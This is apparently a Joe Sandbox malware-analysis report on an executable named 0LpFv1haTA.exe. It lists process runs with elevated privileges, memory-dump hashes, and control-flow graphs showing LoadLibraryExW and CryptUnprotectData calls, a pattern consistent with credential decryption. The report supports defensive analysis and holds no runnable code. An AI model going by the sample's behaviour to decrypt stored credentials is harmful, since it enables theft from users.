                                                                                                                                                                                                Start time:17:29:00
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Imagebase:0x1b2af710000
                                                                                                                                                                                                File size:9'593'944 bytes
                                                                                                                                                                                                MD5 hash:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                Start time:17:30:00
Start date: 27/09/2024
Path: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Imagebase: 0x28989580000
File size: 9'593'944 bytes
MD5 hash: 1BAFB4856A31AE27271FBD2EE1574A4F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 48
Start time: 17:31:00
Start date: 27/09/2024
Path: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Imagebase: 0x1adb32a0000
File size: 9'593'944 bytes
MD5 hash: 1BAFB4856A31AE27271FBD2EE1574A4F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Strings
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID: rV_H
• API String ID: 0-3446107440
• Opcode ID: f821e59922c464158ee2e61d6d44128b31bac067552e0550f30129d0837fac30
• Instruction ID: 206fa3d61dacde1c76f0c160fed5b9e393b621ee258827763f16024488894dde
• Opcode Fuzzy Hash: f821e59922c464158ee2e61d6d44128b31bac067552e0550f30129d0837fac30
• Instruction Fuzzy Hash: 4402E630A1DA8A5FDB96EB7C88556BA3BE1EF5A350F0400B9D44DC71D7EB289C02C751
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48295cde2d7842128c5b63b62df9de84a986d913b70c6a49e74da2a4f24585af
• Instruction ID: 641ea458fe2175ac0ac9d191e6f664038ecb36f5cceaf0739733af4ae64b09e7
• Opcode Fuzzy Hash: 48295cde2d7842128c5b63b62df9de84a986d913b70c6a49e74da2a4f24585af
• Instruction Fuzzy Hash: A9526C7061C94A9FDB95EF2CC895AB937E1FF5A350F1401B9E44ACB2A6DB24EC02C741
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dd435a184e430c87f7e56593d7673e629f76cfff9026f22143c7abae4d2e9a7d
• Instruction ID: f4f70f298b69e74696ba8636bb602402c4ca410c6097d31ea4afd13a2a3aa79e
• Opcode Fuzzy Hash: dd435a184e430c87f7e56593d7673e629f76cfff9026f22143c7abae4d2e9a7d
• Instruction Fuzzy Hash: 4921D830A0951D9FDBA9EB28C4516E9B3B2EF4B341F5054F9D00DE7292DE7AAD81CB04
Strings
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID: P_^=$P_^>$P_^?$P_^@
• API String ID: 0-1157690449
• Opcode ID: 163f549596c30caa3089183bd2ee984cfdb27a846a6fe7a96a303094f5374a57
• Instruction ID: 9db265c08d4c7a817652e8ffb586b313e9e938d6e5b6b33a212a37e51d3462aa
• Opcode Fuzzy Hash: 163f549596c30caa3089183bd2ee984cfdb27a846a6fe7a96a303094f5374a57
• Instruction Fuzzy Hash: A351F9776191655EE3107B7CB8956DE37A4EF81374F440637D18CCA093DE28648A87A4
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bd8df9e7828b375d241e0e3cbe5d91e00a1a96fc9854052f7225e84b453586ee
• Instruction ID: 446af806a34db23319647ec6ba62e2af5fdff7efcad23f98c7a5613076a1d022
• Opcode Fuzzy Hash: bd8df9e7828b375d241e0e3cbe5d91e00a1a96fc9854052f7225e84b453586ee
• Instruction Fuzzy Hash: 4B914A70A096199FDB59DFA8C8956EDBBF1FF59310F10007ED00AE7291EB389882CB55
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9b4f875b83120d06ebbb1424798e233f401bac42383d78dbe5c69dc18575e3f2
• Instruction ID: 409599d635db257414e428d802c90adef2f56a6b52b7003c21ae3fe7b3668c3f
• Opcode Fuzzy Hash: 9b4f875b83120d06ebbb1424798e233f401bac42383d78dbe5c69dc18575e3f2
• Instruction Fuzzy Hash: 3D819E70D0D25A8FD799EF6888552ADBBF0EF56314F0401BEC049DB2D2EB385945CB46
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29816d2184efbdd708f94ad8529596e3f335c0618f103224e8b80a150e8f5fa1
• Instruction ID: f587fea96db5636e65eee8ba7e5dcd9908543e4b4e61e774acf469ca18594be8
• Opcode Fuzzy Hash: 29816d2184efbdd708f94ad8529596e3f335c0618f103224e8b80a150e8f5fa1
• Instruction Fuzzy Hash: F4518870D0964D8FEB98EF6898557EDBBF1EF5A340F0400BAD009E7292DB349885CB45
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 848b3873309d37162788fee936c85e5bc4af632f35de032cfed4057d747f0351
• Instruction ID: 25500c9101eb3ae53ebf9aa89974eb2532cfea5dc847b87a1e973bb6dc8cd5c9
• Opcode Fuzzy Hash: 848b3873309d37162788fee936c85e5bc4af632f35de032cfed4057d747f0351
• Instruction Fuzzy Hash: EE516870A1AA1D8FDB95DB6888947ECBBF1FF5A311F0002AAC00DE72D1DB745985CB42
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 634ef8815c77843abde5c8918bca961c3ab6690f0ade3534b5eb14628c15c8e0
• Instruction ID: b8269427efe2d4c39d957b0ac232d9fc625f7feba1a1b40523780e5b8b43f912
• Opcode Fuzzy Hash: 634ef8815c77843abde5c8918bca961c3ab6690f0ade3534b5eb14628c15c8e0
• Instruction Fuzzy Hash: 7841C370D19A1D9FDB44EFA8D4986ECBBF1EF29355F001179D009E72A1DB789880CB44
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5afa5f2b176c9c35361b203ec8ef6ca8d76cc1447916066d3fc9d60a4cc7acb9
• Instruction ID: e68543d9fc9e2483827b4d4e488e3e8cfcf331c333aea27c0c0064755b95df65
• Opcode Fuzzy Hash: 5afa5f2b176c9c35361b203ec8ef6ca8d76cc1447916066d3fc9d60a4cc7acb9
• Instruction Fuzzy Hash: F2413871E19A1D8FDB94DB68C894BACBBF1FB5A311F1002AAC00DE72D1DB746981CB41
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f4ce71ed2d953bc221c4b32b168daefb48c2b1af03c9d086790caf98e587d904
                                                                                                                                                                                                  • Instruction ID: b2e419013a9134bf60282b6c6f00aa9ceebf6c721510dcede576cbc727482ea3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4ce71ed2d953bc221c4b32b168daefb48c2b1af03c9d086790caf98e587d904
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C418E7090A21A8FD769EF6888952FDBBB0EF52314F4045BEC0499B2D2DB345946CB85
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1b71bd3bfdb0bdc758839af3c44957ebe0428a4885af7a22dd3f84ad642e0bdf
                                                                                                                                                                                                  • Instruction ID: 079666fb45c8fb04aa0e40b5e4275588a7a8a5a7969c0382bb6b461a26545b6d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b71bd3bfdb0bdc758839af3c44957ebe0428a4885af7a22dd3f84ad642e0bdf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA21293770D2699EE311B6ACF8551D937A0EFC1376F000177C288DB093DA24448B83A5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1f57b2712964f5208f48f79d027067c9c5c27957681ef4d97c9f4cc0f0ee5d76
                                                                                                                                                                                                  • Instruction ID: 1a44e4c18fc7674299a9b0d02b200761b3db06265bd987a1badea0b4ee04cc24
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f57b2712964f5208f48f79d027067c9c5c27957681ef4d97c9f4cc0f0ee5d76
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4231E970D1965D9FEB95EBA8C4986ECBBF1FF29351F00006AD009E7292DB785484CB05
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 973fdd835a1ff5366a8d976589b713eb5f8be6774f96db6d92de6fd0ac06ae17
                                                                                                                                                                                                  • Instruction ID: e75aca18259ad4882827d51dbe2af71f89983f595cda65eed8cd722d19c7c892
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 973fdd835a1ff5366a8d976589b713eb5f8be6774f96db6d92de6fd0ac06ae17
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B21F87090565D9FCB55EFA8C8856EDBBF1FF59301F1041A9D00DEB295DB389885CB40
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: bfe2305689d43523e79f39260b04cf91fd7636aa7ed867c49b597b70d5a7ba0a
                                                                                                                                                                                                  • Instruction ID: 7d9917db9d678000cad6a3ad56d305376dce81dacc0402621484d31e712fe525
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe2305689d43523e79f39260b04cf91fd7636aa7ed867c49b597b70d5a7ba0a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51F01432E0991D8FDF94EF98D844AECB7B1FB59341F40017AD00DE3251EB34A8818B40
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 14bb31b434e81a3395680bc47b80ece7b00672b8b102de1cb67089af4dbd15f6
                                                                                                                                                                                                  • Instruction ID: 9be569efcabddf7384f0b1ed9031dea5a70bbb87f94a99f785b5d07c77e31fd5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14bb31b434e81a3395680bc47b80ece7b00672b8b102de1cb67089af4dbd15f6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AF0E232C0E68C9FEB116F64D9252FABBA0FF56311F4111B6E108A71D3EB28A014875A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e05d1510a8574008afc660ed3a9dbbeb009322d0eeaa1386b19b45a34c25a219
                                                                                                                                                                                                  • Instruction ID: 686a11664a11a701948289c6341612c4144153860bf374f62307419b3ac4567d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e05d1510a8574008afc660ed3a9dbbeb009322d0eeaa1386b19b45a34c25a219
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EF0B43185E7899FD397B7308D292E53B50AF57315F4505B9C4088B1D3EF2C54098706
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a5807bd336d126f8438c2c92782d9c22d86c194a39a3afb742231161a39b5bd5
                                                                                                                                                                                                  • Instruction ID: b692056d9720041b615d628f822274e2bc530335cf746bfe3bbf188d30fd6a4d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5807bd336d126f8438c2c92782d9c22d86c194a39a3afb742231161a39b5bd5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0F0BE3090A61A8FDB089BA498502FEBAB0EF46345F00003ED409B31C2DB2859548A76
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f7a938518286229d8d507bce5bd0f2961156277b8509c8d710f210dbb6aff7a9
                                                                                                                                                                                                  • Instruction ID: 0b89ba055f13bcc956f58d799484008d486f5f22a3ebb23fc2de3c2df7b4ef17
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7a938518286229d8d507bce5bd0f2961156277b8509c8d710f210dbb6aff7a9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DF0A971915A288FCB94DB58C898AACB7F1FF58310F4041EAD049EB265CA349985CF41
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 28ff42b1bd9a1d7d4a0727da97901453d64df2d056e790d30893d76c3c930add
                                                                                                                                                                                                  • Instruction ID: 4c892c8028ea9ea8927bf40551b2718c2d56cbb4fa8aef5013d9e238cfc3903a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28ff42b1bd9a1d7d4a0727da97901453d64df2d056e790d30893d76c3c930add
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE0123059E60A9FD385FB74885A6A979E09F46250B0004BDD009CB1E3EE5C58468B57
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID: P_^=$P_^>$P_^?$P_^@
• API String ID: 0-1157690449

Execution Graph

Execution Coverage: 20%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 21.4%
Total number of Nodes: 14
Total number of Limit Nodes: 1
execution_graph 7639 7ff848f16bb8 7641 7ff848f16bbf LoadLibraryExW 7639->7641 7642 7ff848f16cbc 7641->7642 7647 7ff848f16208 7648 7ff848f24010 7647->7648 7651 7ff848f16a30 7648->7651 7650 7ff848f24020 7652 7ff848f16a54 7651->7652 7653 7ff848f16c5c LoadLibraryExW 7652->7653 7654 7ff848f16b4b 7652->7654 7655 7ff848f16cbc 7653->7655 7654->7650 7655->7650 7643 7ff848f187d1 7644 7ff848f187ff CryptUnprotectData 7643->7644 7646 7ff848f18a09 7644->7646

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 276 7ff848f187d1-7ff848f18815 278 7ff848f1885f-7ff848f188ae 276->278 279 7ff848f18817-7ff848f1885a 276->279 281 7ff848f188af-7ff848f188f6 278->281 279->278 283 7ff848f188f8-7ff848f188fa 281->283 284 7ff848f18967-7ff848f18975 281->284 285 7ff848f18976-7ff848f18a07 CryptUnprotectData 283->285 286 7ff848f188fc 283->286 284->285 294 7ff848f18a09 285->294 295 7ff848f18a0f-7ff848f18a81 285->295 287 7ff848f1894b-7ff848f18966 286->287 288 7ff848f188fe-7ff848f18912 286->288 287->284 288->281 291 7ff848f18914-7ff848f18943 288->291 291->287 294->295
APIs
Memory Dump Source
• Source File: 00000007.00000002.4694321247.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff848f10000_0LpFv1haTA.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.4694321247.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff848f10000_0LpFv1haTA.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 378 7ff848f16bb8-7ff848f16c40 382 7ff848f16c5c-7ff848f16cba LoadLibraryExW 378->382 383 7ff848f16c42-7ff848f16c59 378->383 384 7ff848f16cbc 382->384 385 7ff848f16cc2-7ff848f16d14 382->385 383->382 384->385
APIs
Memory Dump Source
• Source File: 00000007.00000002.4694321247.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff848f10000_0LpFv1haTA.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Execution Graph

Execution Coverage: 19.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 6
Total number of Limit Nodes: 0
execution_graph 11855 7ff848f1890d 11856 7ff848f18919 CryptUnprotectData 11855->11856 11858 7ff848f189f9 11856->11858 11859 7ff848f16fa1 11860 7ff848f16fbb LoadLibraryExW 11859->11860 11862 7ff848f170cc 11860->11862

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 844 7ff848f187c1-7ff848f18805 846 7ff848f1884f-7ff848f188e6 844->846 847 7ff848f18807-7ff848f1884a 844->847 850 7ff848f188e8-7ff848f188ec 846->850 851 7ff848f18957-7ff848f1896c 846->851 847->846 853 7ff848f1893b-7ff848f18956 850->853 854 7ff848f188ee-7ff848f18908 850->854 855 7ff848f18974-7ff848f189f7 CryptUnprotectData 851->855 853->851 854->853 857 7ff848f189f9 855->857 858 7ff848f189ff-7ff848f18a71 855->858 857->858
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2451531052.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff848f10000_0LpFv1haTA.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 979 7ff848f1890d-7ff848f189f7 CryptUnprotectData 984 7ff848f189f9 979->984 985 7ff848f189ff-7ff848f18a71 979->985 984->985
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2451531052.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff848f10000_0LpFv1haTA.jbxd
Similarity
• API ID: CryptDataUnprotect
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                                                                                  • Opcode ID: 51492efc139d7a8c63d5268c124e20cb355a901a00e8cc78078580f4c98fd23d
                                                                                                                                                                                                  • Instruction ID: 7e76842ea597c54a5a2b9fe3068cd1cb69b895e4b600983f72838ceb5313fd84
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51492efc139d7a8c63d5268c124e20cb355a901a00e8cc78078580f4c98fd23d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1641A870D19A1D8FDBA4EF18C885BE9B7B1FB59300F0042A9D44DE3255DB74AA84CF45

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 863 7ff848f16fa1-7ff848f16fb9 864 7ff848f16fbb 863->864 865 7ff848f16fbc-7ff848f17050 863->865 864->865 869 7ff848f1706c-7ff848f170ca LoadLibraryExW 865->869 870 7ff848f17052-7ff848f17069 865->870 871 7ff848f170cc 869->871 872 7ff848f170d2-7ff848f17124 869->872 870->869 871->872
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2451531052.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff848f10000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                  • Opcode ID: 747f666f1121363f4e4793babbb3d732a10175cc748a728a5ec8a4b624158102
                                                                                                                                                                                                  • Instruction ID: fadd224a6fa377a62f339fcff816673e8c66b74479acde88ec2bdbb26477251d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 747f666f1121363f4e4793babbb3d732a10175cc748a728a5ec8a4b624158102
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3516D70908A5C8FDB98EF98D889BE9BBF0FB59311F0041AED00DE7252DB759985CB40

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:16%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:17
                                                                                                                                                                                                  Total number of Limit Nodes:2
                                                                                                                                                                                                  execution_graph 3125 7ff848f26e29 3126 7ff848f26e3c 3125->3126 3127 7ff848f2706c LoadLibraryExW 3126->3127 3128 7ff848f26f5b 3126->3128 3129 7ff848f270cc 3127->3129 3130 7ff848f25773 3132 7ff848f26fd0 LoadLibraryExW 3130->3132 3133 7ff848f270cc 3132->3133 3115 7ff848f29bf6 3116 7ff848f29c1f 3115->3116 3119 7ff848f26e40 3116->3119 3118 7ff848f29c30 3122 7ff848f26e64 3119->3122 3120 7ff848f26f5b 3120->3118 3121 7ff848f2706c LoadLibraryExW 3124 7ff848f270cc 3121->3124 3122->3120 3122->3121 3123 7ff848f26f78 3122->3123 3123->3118 3124->3118

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000028.00000002.2642705866.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_40_2_7ff848f20000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
